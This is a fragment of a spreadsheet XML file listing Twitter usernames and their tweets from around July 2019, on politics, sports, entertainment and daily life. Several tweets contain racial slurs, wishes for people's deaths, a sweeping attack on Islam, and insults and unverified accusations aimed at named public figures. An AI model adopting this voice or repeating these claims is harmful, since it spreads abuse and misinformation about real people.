    <t>@MagicallyGlazed @BackToMyOldSelf - down. Stopped letting people get close to me. I'd go to classes, do my workouts with Ric and then hole up in my room until something bothered me to the point that I needed to run around in wolf form. After two years, we found Raf and Landon was with him. We brought them back -</t>
  </si>
  <si>
    <t>xocafeconleche</t>
  </si>
  <si>
    <t>no mask just to let u kno who did it hoe https://t.co/vNDjheg3Hk</t>
  </si>
  <si>
    <t>ImDjShortfuse</t>
  </si>
  <si>
    <t>Best part about securing the bag is coming home to my bestfriend. We both winning, we both good 🤟🏽💕</t>
  </si>
  <si>
    <t>buttercupwhits</t>
  </si>
  <si>
    <t>We’re off bright and early to pick up the oyster shells from last nights Grotter building on the beach.. let’s hope the tractor is there to carry all of our heavy buckets away! 🚜 ______________________________ We are… https://t.co/xJ0WpPocM9</t>
  </si>
  <si>
    <t>SDVisitors</t>
  </si>
  <si>
    <t>Alternatives to immigration detention (ATDs) are more humane, fair and are considerably less costly. Read the @DetentionForum briefing on most frequently asked questions regarding ATDs here: https://t.co/AtcTA3tZGp https://t.co/MTBKNnsxen</t>
  </si>
  <si>
    <t>@StreamSpinner - Ignacio Pena - Fall Apart is now playing on MPG Radios.. Rock Town Lounge - https://t.co/SFbCSOgh1X Support INDIE on Internet Music Radio and share with people who otherwise may never encounter it.</t>
  </si>
  <si>
    <t>biowebguy</t>
  </si>
  <si>
    <t>Example 2: currently identifying local mitigation sites where trees are dying dead. Possible discussion points for local gov, joint park management, save the river, and restoration clients. Also possible gorilla gardening targets since some cages had non-oak growth. https://t.co/fGe7vXYRbl</t>
  </si>
  <si>
    <t>dnigro01</t>
  </si>
  <si>
    <t>No Joke. This Was Picture Number For The First Ride Down The Log. Number 2 Log. The Number Is So Jesus Meets Lady Liberty. https://t.co/uwtLrDKLXa</t>
  </si>
  <si>
    <t>sgrove</t>
  </si>
  <si>
    <t>@thangngoc89 @jaredforsyth @reasonml Yeah, this would be a big one for me.</t>
  </si>
  <si>
    <t>Crazy8Cook</t>
  </si>
  <si>
    <t>Damn Faye, you were beautiful and sexy just the way you were, now you look like Cher..... Faye Dunaway Fired After Crew 'Feared for Their Safety' https://t.co/HKs5irhQSP</t>
  </si>
  <si>
    <t>Flowerr11__</t>
  </si>
  <si>
    <t>When my boss tells me don’t take Emma to school so you can make $$ 😩♥️ bless you Shannon</t>
  </si>
  <si>
    <t>JGilroyUK</t>
  </si>
  <si>
    <t>@Rachel_A_ @GGByrne @Cahill_Lou @theRCN @WeStudentNurse @StNurseProject @LeanneHPatrick @CraigDavidson85 @WeNurses @nmcnews @jenidubs Hello Rachel, well I am beginning to feel like I'll need a clip on one with an elastic cord 🤣</t>
  </si>
  <si>
    <t>tomboysanyu</t>
  </si>
  <si>
    <t>@thelasthokage24 Lotion dries up too fast but you can stay ashy if you want, amateur</t>
  </si>
  <si>
    <t>PhilMcCrackin44</t>
  </si>
  <si>
    <t>Apparently, @dhausleon7 witnessed a different Mueller hearing than the rest of us. Dan Hausle is incapable of providing his audience with a political report without his typical Liberal slant. Shameful ! @7News #NewsForTheLeftLeaning #MuellerHearingBackfires https://t.co/O8MF1uyth6</t>
  </si>
  <si>
    <t>MRKH_DealFinder</t>
  </si>
  <si>
    <t>Get $50 off the frames &amp; 20% off lenses. Screenshot this for an extra 10% off! https://t.co/6KUjVSy5et</t>
  </si>
  <si>
    <t>SharonSeattle</t>
  </si>
  <si>
    <t>Adam Schiff humiliates Meghan McCain over question of collusion I’m insulted Schiff had to waste his time on idiot Meghan McCain. https://t.co/5bLqqIzaPS</t>
  </si>
  <si>
    <t>markthegasman</t>
  </si>
  <si>
    <t>Thats me sorted for the day food ordered @badseedbrewery Kiwi in the glasses with a few more to follow https://t.co/aEUYfyy9SF</t>
  </si>
  <si>
    <t>AndyPHoffman</t>
  </si>
  <si>
    <t>Found out that since I get a 10% discount at Target for being an employee, I have gone from a “soft six” to a “strong 6” in the dating game.</t>
  </si>
  <si>
    <t>CFinancialNews</t>
  </si>
  <si>
    <t>MAXIMUS, Inc. $MMS Expected to Announce Quarterly Sales of $756.84 Million https://t.co/1gkMI9vqxP #markets</t>
  </si>
  <si>
    <t>nailaaaaaaaaa__</t>
  </si>
  <si>
    <t>The weathers more bipolar than me 🥴</t>
  </si>
  <si>
    <t>WattStevenw0505</t>
  </si>
  <si>
    <t>@LacierCholly01 Aye, you and the others need to raise your standards...significantly!!🤦‍♂️🤣</t>
  </si>
  <si>
    <t>kar_nels</t>
  </si>
  <si>
    <t>@JoshKrugerPHL Units on wheels that have big tube to expel hot air out window are popular because easy to install. But they don't auto dehumidify (most have collection tray at bottom if you do want to dehumid). Regular window units drip outside, out of their backs, so easier dehumid.</t>
  </si>
  <si>
    <t>connielipnick</t>
  </si>
  <si>
    <t>@Ash_Pro1 Thank you Ash for letting me know.🙏</t>
  </si>
  <si>
    <t>MoodieMae</t>
  </si>
  <si>
    <t>I’m excited to get all my errands done tomorrow.</t>
  </si>
  <si>
    <t>MsCynthiaBrent</t>
  </si>
  <si>
    <t>@senatemajldr I believe the time has come for you to start thinking about these people: Hugh Scott, John Jacob Rhodes, and Barry Goldwater. They're the ones who convinced "Tricky Dick" Richard Nixon to resign in 1974. You-- along with Kevin McCarthy and Lindsey Graham will be in the same spot.</t>
  </si>
  <si>
    <t>HkPoD1</t>
  </si>
  <si>
    <t>@MoczyTV Congrats!!! I am concerned about that bright light shining on your hands tho... Keep em safe you need them for Games</t>
  </si>
  <si>
    <t>MyArkLaMiss</t>
  </si>
  <si>
    <t>Big CUPS and I Cannot Lie: Man Orders Coffee In the Nude -- https://t.co/YmnqoLGWfe #Weird #National https://t.co/sIXjMtt8jC</t>
  </si>
  <si>
    <t>chetco38</t>
  </si>
  <si>
    <t>@KeithMalinak @realDonaldTrump Good night to have a drinking game</t>
  </si>
  <si>
    <t>DrSRP1</t>
  </si>
  <si>
    <t>@NayukaGorrie @debbie_fearon Whatever the cravings, just do it. Three pregnancies, three x several trimesters crunching frozen water cubes (aka ice).</t>
  </si>
  <si>
    <t>FantasticMrJeff</t>
  </si>
  <si>
    <t>@kat_s_galaxy Yes. Yes I do and I think I could. I’m coming for you Alex Wolfe</t>
  </si>
  <si>
    <t>MagicRockTap</t>
  </si>
  <si>
    <t>Menu drop @The_Ottomen - this weekend at the Tap. Friday 26 / 3pm - 9pm Saturday 27 / 12pm - 9pm Sunday 28 / 12pm - 6pm #huddersfield #streetfood https://t.co/7bkhCqaVUq</t>
  </si>
  <si>
    <t>trfc_james</t>
  </si>
  <si>
    <t>@F1ashPoint @itfcnath @Adam_Ftbl You said “highlight of your season”, thus implying that a friendly against Liverpool is the highlight of the entire 2019/20 season. Will probably enjoy playing Portsmouth, Ipswich, Southend and many other proper clubs more</t>
  </si>
  <si>
    <t>elektrakatwoman</t>
  </si>
  <si>
    <t>.@Apple continues to censor life-saving apps--like VPN--from its store in China. All the while, Uyghur and Tibetan peoples are surveilled and abused: https://t.co/BsvCC2aIqn</t>
  </si>
  <si>
    <t>jeslenehan</t>
  </si>
  <si>
    <t>@RepMattGaetz @realDonaldTrump You seem to have difficulty in understanding the impact of foreign interference in our elections. But it's okay, Matt, not everyone has the type of critical thinking skills to understand their tactics and intentions.</t>
  </si>
  <si>
    <t>BPMW5</t>
  </si>
  <si>
    <t>Reached over 1000 views - follow my insta @bpmw5 and see what’s going on #NewMusicWednesdays #WednesdayThoughts #music #newmusic #beats #bars #HipHopMusic #hiphop #trapmusic #trap #rapmusic #rap #producerlife #producer https://t.co/RjmN89iyuj</t>
  </si>
  <si>
    <t>PeasantsShoes</t>
  </si>
  <si>
    <t>@MrBigC79 @Petchelli @JoanneOfford @paulrevell64 @Nigel_Farage @BorisJohnson I went through my nasty stage with this, I leave my anger for farage, banks, mogg etc. The way they started with talk of Canada and Norway, then convincing their followers that no deal was what they voted for. It’s just dishonest. I work in import export and you make say</t>
  </si>
  <si>
    <t>simongerrard18</t>
  </si>
  <si>
    <t>@bbclaurak The man is not just an enemy of the people and democracy but now the enemy of the Conservative Party, which he now seems intent on destroying. The words traitor, villain, turncoat, just don’t cut it to describe this loathsome man. What about your COUNTRY???</t>
  </si>
  <si>
    <t>waynetronics</t>
  </si>
  <si>
    <t>Kamala Obama Jr isn’t the move bro. If we elect her then we’re just repeating the same mistake we made with Obama and I pray that we’re not that stupid</t>
  </si>
  <si>
    <t>Klil_J</t>
  </si>
  <si>
    <t>@D4MURE @lonifromtheeast I hate niggas somebody should’ve shoot all 5 of they asses 🤦🏾‍♂️ for this</t>
  </si>
  <si>
    <t>sekaimoan</t>
  </si>
  <si>
    <t>@eflxw @FortniteGame idk what you're trying to prove lmao, taking the time to go screenshot my yt sub count is also pretty sad. Especially from someone whos in a cod team.</t>
  </si>
  <si>
    <t>j_holliman</t>
  </si>
  <si>
    <t>@Amber_Cheyennee what? I’m not allowed to e-hit on you out of nowhere with no context? fine whatever https://t.co/ZJyXg2Mmuf</t>
  </si>
  <si>
    <t>nobodyshero69</t>
  </si>
  <si>
    <t>@Femi_Sorry @DarrenPlymouth What gives you the right to spout your constant bullshit?we are leaving get over it or get out of the country.</t>
  </si>
  <si>
    <t>PJMcmahon69</t>
  </si>
  <si>
    <t>@DanSchmuldt If it was to build his confidence, well that didnt work!</t>
  </si>
  <si>
    <t>MadMaxweIl</t>
  </si>
  <si>
    <t>@kor3y I can leave it be for you</t>
  </si>
  <si>
    <t>MyfMaple</t>
  </si>
  <si>
    <t>Drawing from the disability sector “no about us, without us” @jo__riley #NSPC19</t>
  </si>
  <si>
    <t>thebearto</t>
  </si>
  <si>
    <t>@NBAStatGuy_ @Lakers @hornets @NBA @LakersNation @LakerFilmRoom @KingJames @TheLakersReview Here’s the problem: cumulative stats like this have absolutely no bearing on team performance, so it doesn’t even make sense to rank them. This doesn’t show depth or prove that the Lakers will be fine. Their bench is thin and is super inefficient, which will end up hurting them.</t>
  </si>
  <si>
    <t>Lucykat98</t>
  </si>
  <si>
    <t>#RodanandFields Special Offer! Ends July 31st! Enroll as a new PC with a Regimen or Regimen Special to receive a FREE #ActiveHydrationBodyReplenish! This offer won't last long! Don't miss out on this one! https://t.co/NFRblobWWX https://t.co/Un4BHDGqbn</t>
  </si>
  <si>
    <t>fangirlfun123</t>
  </si>
  <si>
    <t>Is the show you’re watching really a gritty crime drama if the main character doesn’t lie against a headstone while bleeding to death at some point?</t>
  </si>
  <si>
    <t>Kryptkeeper_Kat</t>
  </si>
  <si>
    <t>@DollHospytal Shockingly the queer goth in my wants that neon rainbow palette!! 😍🌈💀</t>
  </si>
  <si>
    <t>ETech7</t>
  </si>
  <si>
    <t>Kinova's Robot Arm Turns A Wheelchair Into the Ultimate Assistive Device | Digital Trends https://t.co/C4BBsUw4iz</t>
  </si>
  <si>
    <t>Othmar53</t>
  </si>
  <si>
    <t>New South Wales, Australia, cracks down hard on #AnimalRights terrorists with hefty fines and even jail time. This type of animal rights terrorism came to Canada, but our government has yet to react with similar laws to protects farmers. https://t.co/1eyGIRzRF2</t>
  </si>
  <si>
    <t>JazQuick</t>
  </si>
  <si>
    <t>Some things never change on the way to band @emilyquickkk https://t.co/HH0VW7i4xh</t>
  </si>
  <si>
    <t>susanj357</t>
  </si>
  <si>
    <t>@RepMattGaetz 😂🤣😂Who in the hell are you trying to convince? All you do is lie, cheat and steal. You're triggered by 4 freshmen congresswomen of color who are smarter &amp; braver than you are. We're taking our country back from racist, Russian puppets like you, Gaetz.</t>
  </si>
  <si>
    <t>JulianStrada</t>
  </si>
  <si>
    <t>Waiting for sedation to disconnect my head Or any situation where I'm better off than dead. https://t.co/2WqafjSYHd</t>
  </si>
  <si>
    <t>LinwoodDillard</t>
  </si>
  <si>
    <t>VOLUNTEERS NEEDED FOR THE 2019 SUMMIT OF THE SAINTS: AIM CONVENTION AND HOLY CONVOCATION -------------------------------------------------------------- Volunteer Sign-Up @… https://t.co/7hOb0zyCgX</t>
  </si>
  <si>
    <t>ezvic420</t>
  </si>
  <si>
    <t>@MetallGurll @Birdseye1 @MarilynLavala @kelting430 @jamesho93139786 @marvin_hill123 @traveler002 @wurlybird27 @SanMateogirl11 @Parry2Shawn @SydneyDChase @Schanette55 @troutfman @l_ocvirek @fedagentmark @SnowflakesMom1 @jan_cois @Margiedaly4 @minnesotaavera1 @jtd_gameon12 @Dr_TomSmith_III @ZenfinityDesign @AmericanInfid14 @archangeljf12 @jesse5216 @Avmech1 @3teeas @iAmTheWatchman3 @citysic1 @bacchaus351 @SML4evermore @Nursekymo72 @mailman576 @MzMJ106 @ICanPlainlySee @MikePatrickBand @WelshPatriot74 @MichaelsANewman @JohnS222325 @timzacsdaddy @johnpodesta @HillaryClinton @FoxNewsSunday Yup. No leaks from manning telling how @realDonaldTrump has done war crimes , No leaks from @wikileaks Showing what a Scumbag SwampMonster @POTUS and his family are . Nope Just @CNN making up Bogus Accusations about @POTUS and his Family. https://t.co/DxuLLRKRRV</t>
  </si>
  <si>
    <t>boxerbuddy4</t>
  </si>
  <si>
    <t>@RepMikeLevin Dems created the mess in San Francisco and Los Angeles! We don’t want more of that! 🇺🇸 Vote Trump!!</t>
  </si>
  <si>
    <t>CestrianRRF</t>
  </si>
  <si>
    <t>@Adamcfc1987 @JamescfcBeeton2 I think we’re alright at CM as long as Noble is ahead of Burton in the pecking order.</t>
  </si>
  <si>
    <t>ABC13News</t>
  </si>
  <si>
    <t>HEARTBREAKING: A grandmother says she wants justice for her 6-year-old grandson, who was among the victims shot and killed at the #Gilroy Garlic Festival. https://t.co/vuTxLOziEh https://t.co/55RrAr5dpt</t>
  </si>
  <si>
    <t>ImaniGraham23</t>
  </si>
  <si>
    <t>I went to see lion king yesterday tell me why my ass started crying😂😂that sad</t>
  </si>
  <si>
    <t>evilrobotbill</t>
  </si>
  <si>
    <t>Someone just posted this record on the Broadcast Facebook group - and that's a helluva bandname/album title. https://t.co/vIMHuyCd4g</t>
  </si>
  <si>
    <t>dsolin</t>
  </si>
  <si>
    <t>@ScottFordTVGuy Stay the course. #walkaway no need to listen to liars and scoundrels. #fightthegoodfight #nevergiveup</t>
  </si>
  <si>
    <t>SwiftSwords73</t>
  </si>
  <si>
    <t>Good for Tom Brady and his kid cliff jumping. Hope they had a blast.</t>
  </si>
  <si>
    <t>BlueNGoldJoe</t>
  </si>
  <si>
    <t>@MidrangeScorer That's the God's honest truth. Frederick Douglass would agree.</t>
  </si>
  <si>
    <t>_Followill</t>
  </si>
  <si>
    <t>@InactionNever @Paul4Richardson me after watching the lion king</t>
  </si>
  <si>
    <t>BBCSport</t>
  </si>
  <si>
    <t>Former Barcelona striker Patrick Kluivert has rejoined the club as director of the academy. https://t.co/njlBfGwayK https://t.co/cYeXEPtvi1</t>
  </si>
  <si>
    <t>Honest_5591</t>
  </si>
  <si>
    <t>No surprise, Islam is a religion of intolerance that lacks human rights, women's rights, incites violence and condemns filthy non believers, such as myself, to an eternity in hell fire. Like Christianity, it's needs to be moderate for the changing times, but no one does anything.</t>
  </si>
  <si>
    <t>ILNewsNetwork</t>
  </si>
  <si>
    <t>Illinois lawmaker files bill to let legislators refuse pay raises https://t.co/SxLYxNPy4W</t>
  </si>
  <si>
    <t>Bigpoppyseed</t>
  </si>
  <si>
    <t>@shutyamoufbih Keep living in the past. Be mad .</t>
  </si>
  <si>
    <t>BWalkerNFL</t>
  </si>
  <si>
    <t>Wentz emphasized that there are plenty of guys on the offense who are "team players". Mentions that everyone will get their share and that some games one player might get more targets one week and another player the next.</t>
  </si>
  <si>
    <t>AlukardNY</t>
  </si>
  <si>
    <t>@Puffball125 Puffball!!! Sorry we cant meet up at EVO 😭</t>
  </si>
  <si>
    <t>URRealtorRobin</t>
  </si>
  <si>
    <t>If you want to discuss buying or selling in SW Florida then call me 239-571-3815 #realtorrobinsmith #naplesfloridarealestate #realtor #isellnaplesflorida #homebuyers #ifimawakeimworking https://t.co/57gV4BKLuq</t>
  </si>
  <si>
    <t>BMCRangersRants</t>
  </si>
  <si>
    <t>Final point before bed. It’s alright @RangersFC telling us we can still buy kit. But does the ruling not suggest that the more money we spend now the club will be penalised further in damages?</t>
  </si>
  <si>
    <t>Blackqueenkia</t>
  </si>
  <si>
    <t>Hold down your pussy and your pistol</t>
  </si>
  <si>
    <t>amrigg</t>
  </si>
  <si>
    <t>@flawdanative @LiReHirsch i fukkin hate all 3 of them - i hope they all 3 perish today - the World would be better for it.</t>
  </si>
  <si>
    <t>RushiXO</t>
  </si>
  <si>
    <t>@RexChapman This is the America that Liberals fear. Lmao.</t>
  </si>
  <si>
    <t>reneewebsterii</t>
  </si>
  <si>
    <t>@Alyssa_Milano @RonWyden I wish we could thank you for speaking up for this woman an illegal killed her baby..Why is it you never speak up for the American ppl? Does it not get you your ratings on your show are your tweet hits. Trump hates overrides American ppl https://t.co/3JUVPu1six</t>
  </si>
  <si>
    <t>OneeUpp</t>
  </si>
  <si>
    <t>@Russian64584841 @EmSheDoesIt @SnobFan Stroman best pitcher in the market period. He would of helped us win now. Don’t even know what Garcia is yet.</t>
  </si>
  <si>
    <t>SwillDoesIt</t>
  </si>
  <si>
    <t>gah damn boy @funkos ain’t got no frequent flyer card and i can get hole punched?</t>
  </si>
  <si>
    <t>werewings</t>
  </si>
  <si>
    <t>lame i finished s1 of titans. also naked superman at the end was a nice touch</t>
  </si>
  <si>
    <t>james_Sofield</t>
  </si>
  <si>
    <t>When Stroman said he was made to pitch in New York, he didn’t mean THAT New York....</t>
  </si>
  <si>
    <t>akuma2636</t>
  </si>
  <si>
    <t>Yami no Matsuei ships are Muraki/Tsuzuki (I know I’m a sadist &gt;.&gt;)but I also love Hijiri, Hisoka, Tatsumi and Watari &gt;.&gt; but apart from Watari/Tatsumi I could see everyone with Tsuzuki &gt;.&gt; ooohhh maybe Terazuma/Hisoka XD</t>
  </si>
  <si>
    <t>shamid1516</t>
  </si>
  <si>
    <t>@CoryBooker You’re such a jackass, you think Americans will put you as president 🤣🤣🤣🤣 it had one like you already, and the dumbass was called Obama. I have a tip for you fooker MAGA 2020 will crush you 🤣🤣🤣</t>
  </si>
  <si>
    <t>FastBaseballDev</t>
  </si>
  <si>
    <t>@theFortMcKenry For someone who’s nickname is the “Fort” I’d hope you would choose the bottom 😉</t>
  </si>
  <si>
    <t>CoreyBaumeister</t>
  </si>
  <si>
    <t>Spoke to soon! 2-1 to a better deck. Time to cast some Hogaaks! #MythicchampionshipIV</t>
  </si>
  <si>
    <t>WarrenCarrigan</t>
  </si>
  <si>
    <t>@BaronDestructo No love for that dreadful animated series?</t>
  </si>
  <si>
    <t>pamelasomers</t>
  </si>
  <si>
    <t>Killing coyotes, according to the popular claim, protects livestock. It controls populations. It helps farmers and ranchers and the ecosystem as a whole. Or at least that’s the claim. The science disagrees. https://t.co/gNF0o3wJ6m</t>
  </si>
  <si>
    <t>7100JT</t>
  </si>
  <si>
    <t>Wen I meant I liked charmed I meant the old charmed not the new one wit those fake ass witches</t>
  </si>
  <si>
    <t>hoserdog</t>
  </si>
  <si>
    <t>Doug Jones: 'Dumb' to Question My Opposition to Trump Judges https://t.co/7x2BAf7JTF via @BreitbartNews How do you like the Senator you electrd for Alabama! Yes you were right he was the best choice! Maybe in time you can change his mind about killing babies in the womb!</t>
  </si>
  <si>
    <t>afdavies</t>
  </si>
  <si>
    <t>Bloody restless legs. I'm knackered and my legs want to do an irish jig. Hmm...</t>
  </si>
  <si>
    <t>bxiinx</t>
  </si>
  <si>
    <t>I feel like if healthcare is free women’s menstrual products should be given out for free at doctors offices hospitals and clinics</t>
  </si>
  <si>
    <t>pattistem2002</t>
  </si>
  <si>
    <t>Colby was an excellent chauffeur! Love these milestones-first time he took me for a drive! ❤❤❤ #lovemygrandsons #sixteenanddriving #proudgrandma @ Jenks, Oklahoma https://t.co/aA38obcM1I</t>
  </si>
  <si>
    <t>FamilyJobs</t>
  </si>
  <si>
    <t>Accounting Assistant 2: Toronto, City of (Toronto ON): "Description At a high-level, the Property Management and Lease Administration Unit is responsible for the financial and landlord/tenant functions on all City..." FamilyFriendly eluta https://t.co/8eaoRWKjFs</t>
  </si>
  <si>
    <t>TheJrad</t>
  </si>
  <si>
    <t>@MFSteveHere Curious on your final thoughts. It’s hands down the best movie of the last few years for me. I think as you said in a previous tweet, perfect in every way.</t>
  </si>
  <si>
    <t>btcomc</t>
  </si>
  <si>
    <t>@realDonaldTrump RUSSIA IF YOU'RE LISTENING... wait until Donald Trump is out of office and then give us all you got on him. DON'T SEND IT NOW BECAUSE HIS FLUNKIES WE'LL JUST HIDE IT</t>
  </si>
  <si>
    <t>Donna0527</t>
  </si>
  <si>
    <t>@SpeakerPelosi @RepCummings If Russia tried to steal our elections, it happened while Obozo the Clown was president yet somehow he, his intelligence people, @SenFeinstein's Chinese spy, and even YOU sitting there in the House managed to miss it. I'd say the responsibility is on the DEMS for interference.</t>
  </si>
  <si>
    <t>MarkThomasEdwa1</t>
  </si>
  <si>
    <t>@realDonaldTrump You just can't help going after persons and now entire cities of color, can you? #RacistTrump</t>
  </si>
  <si>
    <t>LastCoinStandng</t>
  </si>
  <si>
    <t>@realDonaldTrump Bitcoin sidesteps all the financial shenanigans and manipulations you are talking about. Buy bitcoin.</t>
  </si>
  <si>
    <t>NoorNahas1</t>
  </si>
  <si>
    <t>Rescue workers and people look through the aftermath of yesterday's strikes in Maart al Numan, #Idlib https://t.co/EprBWMacgs https://t.co/1o1Ca2gdjf</t>
  </si>
  <si>
    <t>rosewood1618</t>
  </si>
  <si>
    <t>@SAChakrabooks There’s a subreddit called r/menweittingwomen that you need to check out. It’s hilarious.</t>
  </si>
  <si>
    <t>ignemaromatibus</t>
  </si>
  <si>
    <t>@fxngsfogarty “Will do” She mumbles placing the soup on her nightstand before closing her eyes again</t>
  </si>
  <si>
    <t>krisanthia_24</t>
  </si>
  <si>
    <t>Yall really think a nigga care if you in school, good job, got yo own crib, own car etc...NO BITCH he will cheat on you w/ a bitch that's fucking niggas just to smoke 😂 If you doing something in life do it for YOURSELF. Stop giving yo all to these niggas🙄.</t>
  </si>
  <si>
    <t>Jacq4Peace</t>
  </si>
  <si>
    <t>@80sNightmares @RealDrRickMusic @realkareemdream @realDonaldTrump @JoeBiden Thank you; and I love that old white man, president @JoeBiden 2020 gets my primary vote no matter what and I am not changing. #VoteBlueNoMatterWho2020 down ballot.</t>
  </si>
  <si>
    <t>I entered @skinit's "Back to School" Giveaway to win an Apple iPad Mini, Apple AirPods, Apple Pencil + More! https://t.co/v9Gmi8UdaQ</t>
  </si>
  <si>
    <t>Nythvn</t>
  </si>
  <si>
    <t>Add to cod/fort chats so I can socialise</t>
  </si>
  <si>
    <t>eb61629</t>
  </si>
  <si>
    <t>@CNN @VictorBlackwell I’m sorry Victor, no one should have to listen to that. What a piece of trash the President is.</t>
  </si>
  <si>
    <t>JoshuaYJackson</t>
  </si>
  <si>
    <t>@RogerPalmeri Sadly some people need to learn through experience. The most ardent-europhiles don’t live in places where livelihoods have been destroyed by EU policies.</t>
  </si>
  <si>
    <t>kartmaster</t>
  </si>
  <si>
    <t>I think this one has potential. A lot of people want to know what cards are in it. My guess is nada. https://t.co/q211cDXyGD</t>
  </si>
  <si>
    <t>KV_NNY</t>
  </si>
  <si>
    <t>@shyjizzyy Omg when u go back to school?</t>
  </si>
  <si>
    <t>AsturianoEnUSA</t>
  </si>
  <si>
    <t>The bitches are back!!! 🤟 #usa #southcarolina #columbia #expats #puppy #puppylove #doglovers https://t.co/5i3qMR1lfh https://t.co/mgjur5oNKT</t>
  </si>
  <si>
    <t>marymcclelland_</t>
  </si>
  <si>
    <t>I’m crying as I type this but here’s my recap of the last #RHONY episode of this season. https://t.co/m3uY7E8Ne4 I’ll miss you ladies so much. Yes, even Luann</t>
  </si>
  <si>
    <t>HcllandTcm</t>
  </si>
  <si>
    <t>@EmpyreanDame I think this is the first time in weeks that I can finally relax. I’ll probably tell you on Sunday that I didn’t get much of it.</t>
  </si>
  <si>
    <t>mattspolitical</t>
  </si>
  <si>
    <t>@soledadobrien @marcorubio Grandpa Mitt, why do you let the Orange man say these things?</t>
  </si>
  <si>
    <t>calebduggeryoo</t>
  </si>
  <si>
    <t>who shoots up a garlic festival</t>
  </si>
  <si>
    <t>tonybonesxxx</t>
  </si>
  <si>
    <t>Tomorrow is a UNiversal day. Any ladies want to cum? hehe</t>
  </si>
  <si>
    <t>tribalfootball</t>
  </si>
  <si>
    <t>Wolves in advanced talks for Real Madrid defender Jesus Vallejo #wolves https://t.co/uPDHFhUp5w</t>
  </si>
  <si>
    <t>raymondcamden</t>
  </si>
  <si>
    <t>@sharondio thanks for sharing that :)</t>
  </si>
  <si>
    <t>KYPatriot17</t>
  </si>
  <si>
    <t>@JacobPoliticsKy @FloMartinSec @KYGOP @realDonaldTrump @RepCummings @senatemajldr Not one budget, not one bill has become law in this century that the GOP didn't approve.</t>
  </si>
  <si>
    <t>OldWomanW2cats</t>
  </si>
  <si>
    <t>Her disrespect 4 the moderator&amp;yet she still screeches as the camera pulls back. What IS that? Seeking attention? The need2 b heard? PassiveAggressive taunting, thinks she’s right, no discussion necessary? WTH @MeghanMcCain. U owe @WhoopiGoldberg an apology. @JoyVBehar @sunny too</t>
  </si>
  <si>
    <t>Elder</t>
  </si>
  <si>
    <t>The moment we have been waiting for! It’s a BOY!!!!!! https://t.co/KywihEgkeu</t>
  </si>
  <si>
    <t>WerewolfBelly</t>
  </si>
  <si>
    <t>Why did this old white woman really walk up to me like "do you know where so and so associate is?" At the Kroger Lol Bitch? Do I look like I work here? The fuck? https://t.co/J7y9MppXI0</t>
  </si>
  <si>
    <t>SeanSykes92</t>
  </si>
  <si>
    <t>What a day for a day dream</t>
  </si>
  <si>
    <t>bkarimoore</t>
  </si>
  <si>
    <t>One job. Thank you, Father, for everything I still don’t understand. I am profoundly grateful for what I survived.</t>
  </si>
  <si>
    <t>rolan1220</t>
  </si>
  <si>
    <t>A rush by residents to snap selfies near a toxic reservoir dubbed the ‘Siberian Maldives’ has prompted the company that uses it as a dump to set up a 24-hour guard https://t.co/ZQFkpcTflQ via @luxury</t>
  </si>
  <si>
    <t>PecinaNessa</t>
  </si>
  <si>
    <t>There’s so many parties today and of course, I’m baby sitting and my mans @ work. 😒</t>
  </si>
  <si>
    <t>TheeHighGay</t>
  </si>
  <si>
    <t>thee amount of hustle i did today but also in the past that all paid off this week is wild but so damn proud🤑</t>
  </si>
  <si>
    <t>VermillionBrain</t>
  </si>
  <si>
    <t>@jurijuri @ellle_em So not only does this woman have do deal with OP being an oblivious asshole, but it’s compounded by being forced into the closet by her family? And all he can say is “I like her because she performs labor for me”? This is borderline sociopathic!</t>
  </si>
  <si>
    <t>ImSpoderJuan</t>
  </si>
  <si>
    <t>I never thought Id see the day when a guy 600 games buried into Silver 3 flames me and my knowledge in competitive play XD</t>
  </si>
  <si>
    <t>suicidejams</t>
  </si>
  <si>
    <t>@itsSKO_ The only black ice I want</t>
  </si>
  <si>
    <t>SIKACEO</t>
  </si>
  <si>
    <t>Hey Twitter! This man has been seen masturbating at #Birds in Hollywood and has been following my friend. Who is he? #creep #findhim https://t.co/QUfmqi54K9</t>
  </si>
  <si>
    <t>KZXcellent</t>
  </si>
  <si>
    <t>@RlZEGREYMON The only problem with III's Critical Mode is how punishing the large zones can be with losing progress. You just have to adapt and use save points. Unlike KH2 the Critical Mode in KH3 continues to be a challenge for the entire run and not just the first 6-7 worlds.</t>
  </si>
  <si>
    <t>hwatkins927</t>
  </si>
  <si>
    <t>Need more of these authentic narratives re disability rooted in truth, mirrored in meaningful ways, impacts self &amp; societal consciousness. So much cultural context &amp; Black disability lens perspective from lived experience tends to be missing/overlooked. Complex, layered, nuanced.</t>
  </si>
  <si>
    <t>CockroachBreeda</t>
  </si>
  <si>
    <t>@mattdivide I think you need to go ahead and calm the fuck down</t>
  </si>
  <si>
    <t>JennyBurnley1</t>
  </si>
  <si>
    <t>@pattiJadkins Good to meet you, Patti.</t>
  </si>
  <si>
    <t>big081574</t>
  </si>
  <si>
    <t>@PyronDonna @PamKeithFL Hubby won't let me have any MAGA gear, for MY safety he says...😥</t>
  </si>
  <si>
    <t>DSahsprite</t>
  </si>
  <si>
    <t>@greenallefc @JLcrues I didn’t say that and I suffer with anxiety depression also have autism I know how hard it can be around people. Him going to Germany proved he hasn’t a problem. Seeing fans while he’s playing supporting him and he has a miserable face on him. He wants to go what’s the problem?</t>
  </si>
  <si>
    <t>DfwairporterT</t>
  </si>
  <si>
    <t>“Iv gotta guy”.... Three simple words that will make any business owner blush when Their client says them! Let DFWAirporter be “your guy” for all your transportation needs! https://t.co/vHOyAHim5w</t>
  </si>
  <si>
    <t>Sharpstick64</t>
  </si>
  <si>
    <t>@lyriscutie0 You need to talk to us, my friend.</t>
  </si>
  <si>
    <t>_lalalexxi</t>
  </si>
  <si>
    <t>Someone Great on Netflix fucked me up omg</t>
  </si>
  <si>
    <t>lizette_arias</t>
  </si>
  <si>
    <t>@cheybuttaaa watch me fuck around and work on myself until I’m 95 and then die alone oops LMAOOO</t>
  </si>
  <si>
    <t>jdwadvocacy</t>
  </si>
  <si>
    <t>Humans are such a disappointment.......I am glad there is no God (spoiler alert), he would be the so annoyed at how we have turned out.</t>
  </si>
  <si>
    <t>thesmallfakers</t>
  </si>
  <si>
    <t>@DavidBowieGlam 1989 right through to about 1996 was fantastic all the way.</t>
  </si>
  <si>
    <t>KCRoyalFan</t>
  </si>
  <si>
    <t>Ok, so the Braves have at least one crappy broadcaster too. Last inning he said Cuthbert had a single past “Ozzie Smith”, and during Bubba’s AB said, “Got him looking!... 2-2” 😂</t>
  </si>
  <si>
    <t>fathead518</t>
  </si>
  <si>
    <t>@mbeezy2599 It’s pathetic. Just as pathetic as cashman’s ability to acquire starting pitching.</t>
  </si>
  <si>
